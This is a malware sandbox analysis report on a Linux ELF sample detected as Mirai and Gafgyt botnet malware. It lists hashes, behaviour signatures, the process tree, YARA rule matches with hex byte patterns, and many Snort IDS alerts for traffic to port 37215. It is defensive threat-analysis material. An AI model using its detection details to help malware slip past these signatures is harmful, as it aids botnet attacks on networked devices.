Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
i586.elf

Overview

General Information

Sample name:i586.elf
Analysis ID:1456869
MD5:a87c9427ea3736589feeea4f976a3b5b
SHA1:6be27a1176ea3e7125d61b2bb0d2216f31309f08
SHA256:88fd3bedead95c68dc82e634ef76836bbec4213c74303e8e8f530859b6b4cc5f
Infos:

Detection

Mirai, Gafgyt
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Gafgyt
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Contains symbols with names commonly found in malware
Machine Learning detection for sample
Opens /proc/net/* files useful for finding connected devices and routers
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
HTTP GET or POST without a user agent
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are user agent strings indicative of HTTP manipulation
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1456869
Start date and time:2024-06-13 21:31:12 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i586.elf
Detection:MAL
Classification:mal100.spre.troj.linELF@0/0@2/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: i586.elf
Command:/tmp/i586.elf
PID:5537
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate alot
Standard Error:
  • system is lnxubuntu20
  • i586.elf (PID: 5537, Parent: 5462, MD5: a87c9427ea3736589feeea4f976a3b5b) Arguments: /tmp/i586.elf
    • i586.elf New Fork (PID: 5538, Parent: 5537)
    • i586.elf New Fork (PID: 5539, Parent: 5537)
    • i586.elf New Fork (PID: 5540, Parent: 5537)
      • i586.elf New Fork (PID: 5542, Parent: 5540)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
SourceRuleDescriptionAuthorStrings
i586.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    i586.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      i586.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        i586.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x1029c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x102b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x102c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x102d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x102ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x10300:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x10314:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x10328:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1033c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x10350:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x10364:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x10378:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1038c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x103a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x103b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x103c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x103dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x103f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x10404:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x10418:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1042c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        i586.elfLinux_Trojan_Gafgyt_c573932bunknownunknown
        • 0x1873:$a: 83 7D 18 00 74 22 8B 45 1C 83 E0 02 85 C0 74 18 83 EC 08 6A 2D FF
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        5537.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
          5537.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            5538.1.0000000008048000.000000000805c000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
              5537.1.0000000008048000.000000000805c000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
              • 0x1029c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x102b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x102c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x102d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x102ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x10300:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x10314:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x10328:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1033c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x10350:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x10364:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x10378:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1038c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x103a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x103b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x103c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x103dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x103f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x10404:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x10418:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1042c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              5537.1.0000000008048000.000000000805c000.r-x.sdmpLinux_Trojan_Gafgyt_c573932bunknownunknown
              • 0x1873:$a: 83 7D 18 00 74 22 8B 45 1C 83 E0 02 85 C0 74 18 83 EC 08 6A 2D FF
              Click to see the 25 entries
              Timestamp:06/13/24-21:31:59.199967
              SID:2835222
              Source Port:58542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725665
              SID:2835222
              Source Port:43118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222534
              SID:2835222
              Source Port:42226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731303
              SID:2835222
              Source Port:53838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101027
              SID:2829579
              Source Port:45826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677771
              SID:2835222
              Source Port:40044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565737
              SID:2835222
              Source Port:35564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079300
              SID:2829579
              Source Port:59220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787823
              SID:2835222
              Source Port:41400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238402
              SID:2835222
              Source Port:59708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098379
              SID:2829579
              Source Port:57642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057873
              SID:2829579
              Source Port:39018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543663
              SID:2835222
              Source Port:50388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801288
              SID:2829579
              Source Port:42234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214421
              SID:2829579
              Source Port:56402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523917
              SID:2829579
              Source Port:56466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258930
              SID:2829579
              Source Port:59494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271190
              SID:2829579
              Source Port:60086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231105
              SID:2835222
              Source Port:53094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840122
              SID:2835222
              Source Port:42466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551408
              SID:2829579
              Source Port:44908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193123
              SID:2835222
              Source Port:49346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404290
              SID:2835222
              Source Port:49828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229487
              SID:2835222
              Source Port:42950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.679107
              SID:2835222
              Source Port:44424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242141
              SID:2835222
              Source Port:40892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276889
              SID:2829579
              Source Port:34810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420279
              SID:2829579
              Source Port:37630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820025
              SID:2835222
              Source Port:60998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415783
              SID:2829579
              Source Port:51180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553662
              SID:2829579
              Source Port:44876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636186
              SID:2835222
              Source Port:48404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042942
              SID:2835222
              Source Port:47374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791614
              SID:2829579
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991505
              SID:2829579
              Source Port:56758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885392
              SID:2835222
              Source Port:54990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059580
              SID:2835222
              Source Port:52636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909492
              SID:2829579
              Source Port:41402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153671
              SID:2835222
              Source Port:35016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320505
              SID:2829579
              Source Port:49082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486638
              SID:2835222
              Source Port:51054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346072
              SID:2835222
              Source Port:51056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195522
              SID:2829579
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403052
              SID:2835222
              Source Port:57092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524532
              SID:2835222
              Source Port:35654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214131
              SID:2829579
              Source Port:35702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439160
              SID:2835222
              Source Port:42768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210379
              SID:2829579
              Source Port:42530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076570
              SID:2829579
              Source Port:48382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359645
              SID:2829579
              Source Port:47894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758059
              SID:2835222
              Source Port:55490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786579
              SID:2835222
              Source Port:52288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404318
              SID:2835222
              Source Port:59206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013906
              SID:2829579
              Source Port:34658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607713
              SID:2829579
              Source Port:56828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678662
              SID:2835222
              Source Port:55960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871560
              SID:2829579
              Source Port:54368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409318
              SID:2835222
              Source Port:43130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787702
              SID:2835222
              Source Port:32914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708102
              SID:2829579
              Source Port:54746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231944
              SID:2829579
              Source Port:51920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254979
              SID:2835222
              Source Port:41118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154789
              SID:2835222
              Source Port:36938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278583
              SID:2835222
              Source Port:59022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611350
              SID:2835222
              Source Port:40336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106123
              SID:2829579
              Source Port:41044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992917
              SID:2835222
              Source Port:42674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751864
              SID:2835222
              Source Port:51094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833389
              SID:2829579
              Source Port:50190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632286
              SID:2835222
              Source Port:47462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176562
              SID:2829579
              Source Port:57096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571518
              SID:2835222
              Source Port:53368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060290
              SID:2829579
              Source Port:54672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749491
              SID:2835222
              Source Port:33872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730466
              SID:2829579
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199109
              SID:2829579
              Source Port:47792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350115
              SID:2829579
              Source Port:57882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263595
              SID:2829579
              Source Port:41898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265554
              SID:2829579
              Source Port:59538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223979
              SID:2829579
              Source Port:46664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316390
              SID:2829579
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306455
              SID:2829579
              Source Port:57358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415920
              SID:2829579
              Source Port:37492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973929
              SID:2835222
              Source Port:58118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456128
              SID:2835222
              Source Port:41892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752957
              SID:2829579
              Source Port:33084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783485
              SID:2835222
              Source Port:55820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075040
              SID:2835222
              Source Port:34356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654307
              SID:2835222
              Source Port:34970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079890
              SID:2835222
              Source Port:45622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524412
              SID:2835222
              Source Port:50146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175527
              SID:2835222
              Source Port:38486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749466
              SID:2835222
              Source Port:58546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276964
              SID:2835222
              Source Port:42696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871206
              SID:2829579
              Source Port:37096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039707
              SID:2829579
              Source Port:58658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657154
              SID:2829579
              Source Port:55098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350232
              SID:2835222
              Source Port:36680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630504
              SID:2835222
              Source Port:57722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914476
              SID:2829579
              Source Port:53052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151621
              SID:2835222
              Source Port:60002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219216
              SID:2829579
              Source Port:51334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553699
              SID:2835222
              Source Port:44266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296232
              SID:2829579
              Source Port:44934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709043
              SID:2829579
              Source Port:50772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841060
              SID:2835222
              Source Port:53214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758539
              SID:2829579
              Source Port:59208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660855
              SID:2835222
              Source Port:54162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356560
              SID:2835222
              Source Port:39954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229662
              SID:2829579
              Source Port:44926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358470
              SID:2829579
              Source Port:58580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708826
              SID:2835222
              Source Port:40682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238840
              SID:2829579
              Source Port:53094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307481
              SID:2835222
              Source Port:51420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729354
              SID:2835222
              Source Port:52280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046037
              SID:2835222
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357793
              SID:2835222
              Source Port:54474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416610
              SID:2835222
              Source Port:53168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869180
              SID:2835222
              Source Port:46664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406015
              SID:2829579
              Source Port:48604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509981
              SID:2829579
              Source Port:40094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406731
              SID:2829579
              Source Port:47436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181125
              SID:2835222
              Source Port:34632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
